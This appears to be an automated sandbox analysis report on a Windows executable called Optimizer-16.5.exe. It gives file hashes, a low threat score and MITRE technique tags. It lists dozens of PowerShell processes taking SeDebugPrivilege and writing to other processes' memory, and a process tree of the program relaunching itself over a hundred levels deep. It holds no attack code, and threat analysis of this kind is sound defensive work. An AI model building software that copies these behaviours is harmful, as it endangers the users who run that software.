dececde4bf14f513007b0d2989b77f66a004fc073c742b6d6e38d36a043cc042

Analysis

max time kernel
299s
max time network
122s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
11/05/2024, 20:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Optimizer-16.5.exe
Size

1.1MB
MD5

1189fe3414a4b9c4a228745a21eb8ade
SHA1

885f92a53c1e990bee847f765b6cac90a5216dea
SHA256

dececde4bf14f513007b0d2989b77f66a004fc073c742b6d6e38d36a043cc042
SHA512

51de1f053ef2f2cc396a205d76355c1a148fbf49f093287ab3d740de2616b95d3264d427a19c8aa2af9e5cba9c4899ae4bb0ef982386c18bb60cd1fb17040e15
SSDEEP

24576:F4PJsbumk/X/MKBDjaEzq66Q2gYdXvbMc1/x+8ZIV9ezeE/0/x4:qJok/X/MKBvaw6h9dXZ1/E8o9uey0O

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2056	powershell.exe
1892	powershell.exe
1936	powershell.exe
2020	powershell.exe
1740	powershell.exe
2476	powershell.exe
1768	powershell.exe
1484	powershell.exe
2768	powershell.exe
1192	powershell.exe
1868	powershell.exe
1716	powershell.exe
2256	powershell.exe
1948	powershell.exe
2548	powershell.exe
1780	powershell.exe
2524	powershell.exe
1304	powershell.exe
1212	powershell.exe
624	powershell.exe
2216	powershell.exe
3016	powershell.exe
1976	powershell.exe
2892	powershell.exe
2292	powershell.exe
1696	powershell.exe
2092	powershell.exe
864	powershell.exe
2988	powershell.exe
2936	powershell.exe
2480	powershell.exe
2568	powershell.exe
2168	powershell.exe
2848	powershell.exe
748	powershell.exe
2488	powershell.exe
2648	powershell.exe
1728	powershell.exe
2496	powershell.exe
2644	powershell.exe
2568	powershell.exe
2032	powershell.exe
340	powershell.exe
2452	powershell.exe
2104	powershell.exe
1304	powershell.exe
2644	powershell.exe
1516	powershell.exe
1260	powershell.exe
2796	powershell.exe
1868	powershell.exe
2284	powershell.exe
1168	powershell.exe
2484	powershell.exe
2112	powershell.exe
2768	powershell.exe
1776	powershell.exe
1428	powershell.exe
2624	powershell.exe
1964	powershell.exe
2180	powershell.exe
1936	powershell.exe
1864	powershell.exe
1596	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2648	powershell.exe
2480	powershell.exe
2760	powershell.exe
1304	powershell.exe
1948	powershell.exe
1740	powershell.exe
1172	powershell.exe
1108	powershell.exe
1596	powershell.exe
2568	powershell.exe
2476	powershell.exe
2716	powershell.exe
1304	powershell.exe
1988	powershell.exe
1712	powershell.exe
1064	powershell.exe
1612	powershell.exe
2644	powershell.exe
2292	powershell.exe
2112	powershell.exe
1356	powershell.exe
1728	powershell.exe
1948	powershell.exe
1712	powershell.exe
1484	powershell.exe
1612	powershell.exe
2548	powershell.exe
2972	powershell.exe
624	powershell.exe
2032	powershell.exe
2392	powershell.exe
2168	powershell.exe
324	powershell.exe
300	powershell.exe
1936	powershell.exe
2284	powershell.exe
1748	powershell.exe
2624	powershell.exe
1332	powershell.exe
1516	powershell.exe
2216	powershell.exe
1740	powershell.exe
1252	powershell.exe
1260	powershell.exe
2056	powershell.exe
2880	powershell.exe
3016	powershell.exe
1768	powershell.exe
1020	powershell.exe
2796	powershell.exe
340	powershell.exe
864	powershell.exe
1484	powershell.exe
1612	powershell.exe
2564	powershell.exe
2668	powershell.exe
2824	powershell.exe
1480	powershell.exe
2028	powershell.exe
2848	powershell.exe
1868	powershell.exe
1780	powershell.exe
1696	powershell.exe
2768	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2648	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2760	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	1172	powershell.exe
Token: SeDebugPrivilege	1108	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2716	powershell.exe
Token: SeDebugPrivilege	1304	powershell.exe
Token: SeDebugPrivilege	1988	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1064	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeDebugPrivilege	1728	powershell.exe
Token: SeDebugPrivilege	1948	powershell.exe
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2972	powershell.exe
Token: SeDebugPrivilege	624	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	324	powershell.exe
Token: SeDebugPrivilege	300	powershell.exe
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	1748	powershell.exe
Token: SeDebugPrivilege	2624	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	1260	powershell.exe
Token: SeDebugPrivilege	2056	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	3016	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	1020	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	340	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe
Token: SeDebugPrivilege	2668	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	1868	powershell.exe
Token: SeDebugPrivilege	1780	powershell.exe
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeDebugPrivilege	2768	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2140 wrote to memory of 2204	2140	Optimizer-16.5.exe	29
PID 2140 wrote to memory of 2204	2140	Optimizer-16.5.exe	29
PID 2140 wrote to memory of 2204	2140	Optimizer-16.5.exe	29
PID 2140 wrote to memory of 3032	2140	Optimizer-16.5.exe	30
PID 2140 wrote to memory of 3032	2140	Optimizer-16.5.exe	30
PID 2140 wrote to memory of 3032	2140	Optimizer-16.5.exe	30
PID 3032 wrote to memory of 2648	3032	cmd.exe	32
PID 3032 wrote to memory of 2648	3032	cmd.exe	32
PID 3032 wrote to memory of 2648	3032	cmd.exe	32
PID 2204 wrote to memory of 2692	2204	Optimizer-16.5.exe	33
PID 2204 wrote to memory of 2692	2204	Optimizer-16.5.exe	33
PID 2204 wrote to memory of 2692	2204	Optimizer-16.5.exe	33
PID 2204 wrote to memory of 2596	2204	Optimizer-16.5.exe	34
PID 2204 wrote to memory of 2596	2204	Optimizer-16.5.exe	34
PID 2204 wrote to memory of 2596	2204	Optimizer-16.5.exe	34
PID 2596 wrote to memory of 2480	2596	cmd.exe	36
PID 2596 wrote to memory of 2480	2596	cmd.exe	36
PID 2596 wrote to memory of 2480	2596	cmd.exe	36
PID 2692 wrote to memory of 1400	2692	Optimizer-16.5.exe	37
PID 2692 wrote to memory of 1400	2692	Optimizer-16.5.exe	37
PID 2692 wrote to memory of 1400	2692	Optimizer-16.5.exe	37
PID 2692 wrote to memory of 836	2692	Optimizer-16.5.exe	38
PID 2692 wrote to memory of 836	2692	Optimizer-16.5.exe	38
PID 2692 wrote to memory of 836	2692	Optimizer-16.5.exe	38
PID 836 wrote to memory of 2760	836	cmd.exe	40
PID 836 wrote to memory of 2760	836	cmd.exe	40
PID 836 wrote to memory of 2760	836	cmd.exe	40
PID 1400 wrote to memory of 1520	1400	Optimizer-16.5.exe	41
PID 1400 wrote to memory of 1520	1400	Optimizer-16.5.exe	41
PID 1400 wrote to memory of 1520	1400	Optimizer-16.5.exe	41
PID 1400 wrote to memory of 1020	1400	Optimizer-16.5.exe	42
PID 1400 wrote to memory of 1020	1400	Optimizer-16.5.exe	42
PID 1400 wrote to memory of 1020	1400	Optimizer-16.5.exe	42
PID 1020 wrote to memory of 1304	1020	cmd.exe	44
PID 1020 wrote to memory of 1304	1020	cmd.exe	44
PID 1020 wrote to memory of 1304	1020	cmd.exe	44
PID 1520 wrote to memory of 2008	1520	Optimizer-16.5.exe	45
PID 1520 wrote to memory of 2008	1520	Optimizer-16.5.exe	45
PID 1520 wrote to memory of 2008	1520	Optimizer-16.5.exe	45
PID 1520 wrote to memory of 2472	1520	Optimizer-16.5.exe	46
PID 1520 wrote to memory of 2472	1520	Optimizer-16.5.exe	46
PID 1520 wrote to memory of 2472	1520	Optimizer-16.5.exe	46
PID 2472 wrote to memory of 1948	2472	cmd.exe	48
PID 2472 wrote to memory of 1948	2472	cmd.exe	48
PID 2472 wrote to memory of 1948	2472	cmd.exe	48
PID 2008 wrote to memory of 764	2008	Optimizer-16.5.exe	49
PID 2008 wrote to memory of 764	2008	Optimizer-16.5.exe	49
PID 2008 wrote to memory of 764	2008	Optimizer-16.5.exe	49
PID 2008 wrote to memory of 572	2008	Optimizer-16.5.exe	50
PID 2008 wrote to memory of 572	2008	Optimizer-16.5.exe	50
PID 2008 wrote to memory of 572	2008	Optimizer-16.5.exe	50
PID 572 wrote to memory of 1740	572	cmd.exe	52
PID 572 wrote to memory of 1740	572	cmd.exe	52
PID 572 wrote to memory of 1740	572	cmd.exe	52
PID 764 wrote to memory of 1584	764	Optimizer-16.5.exe	53
PID 764 wrote to memory of 1584	764	Optimizer-16.5.exe	53
PID 764 wrote to memory of 1584	764	Optimizer-16.5.exe	53
PID 764 wrote to memory of 876	764	Optimizer-16.5.exe	54
PID 764 wrote to memory of 876	764	Optimizer-16.5.exe	54
PID 764 wrote to memory of 876	764	Optimizer-16.5.exe	54
PID 876 wrote to memory of 1172	876	cmd.exe	56
PID 876 wrote to memory of 1172	876	cmd.exe	56
PID 876 wrote to memory of 1172	876	cmd.exe	56
PID 1584 wrote to memory of 680	1584	Optimizer-16.5.exe	57

C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
"C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2140
- C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
  "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
    "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
      "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1400
    - - C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1520
      - C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2008
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:764
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        9⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        10⤵
        
        PID:1888
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        11⤵
        
        PID:2556
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        12⤵
        
        PID:2388
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        13⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        14⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        15⤵
        
        PID:756
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        16⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        17⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        18⤵
        
        PID:2124
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        19⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        20⤵
        
        PID:2520
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        21⤵
        
        PID:2276
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        22⤵
        
        PID:2720
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        23⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        24⤵
        
        PID:320
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        25⤵
        
        PID:2016
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        26⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        27⤵
        
        PID:884
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        28⤵
        
        PID:3024
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        29⤵
        
        PID:2648
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        30⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        31⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        32⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        33⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        34⤵
        
        PID:824
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        35⤵
        
        PID:1676
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        36⤵
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        37⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        38⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        39⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        40⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        41⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        42⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        43⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        44⤵
        
        PID:3020
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        45⤵
        
        PID:956
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        46⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        47⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        48⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        49⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        50⤵
        
        PID:2676
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        51⤵
        
        PID:2476
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        52⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        53⤵
        
        PID:988
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        54⤵
        
        PID:844
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        55⤵
        
        PID:1672
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        56⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        57⤵
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        58⤵
        
        PID:1792
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        59⤵
        
        PID:840
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        60⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        61⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        62⤵
        
        PID:1948
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        63⤵
        
        PID:920
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        64⤵
        
        PID:2876
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        65⤵
        
        PID:1440
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        66⤵
        
        PID:876
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        67⤵
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        68⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        69⤵
        
        PID:2820
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        70⤵
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        71⤵
        
        PID:1616
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        72⤵
        
        PID:1944
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        73⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        74⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        75⤵
        
        PID:880
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        76⤵
        
        PID:2812
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        77⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        78⤵
        
        PID:1476
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        79⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        80⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        81⤵
        
        PID:1012
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        82⤵
        
        PID:1188
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        83⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        84⤵
        
        PID:536
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        85⤵
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        86⤵
        
        PID:2052
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        87⤵
        
        PID:2324
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        88⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        89⤵
        
        PID:2020
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        90⤵
        
        PID:1776
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        91⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        92⤵
        
        PID:2328
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        93⤵
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        94⤵
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        95⤵
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        96⤵
        
        PID:1468
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        97⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        98⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        99⤵
        
        PID:1480
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        100⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        101⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Optimizer-16.5.exe"
        102⤵
        
        PID:2176
        
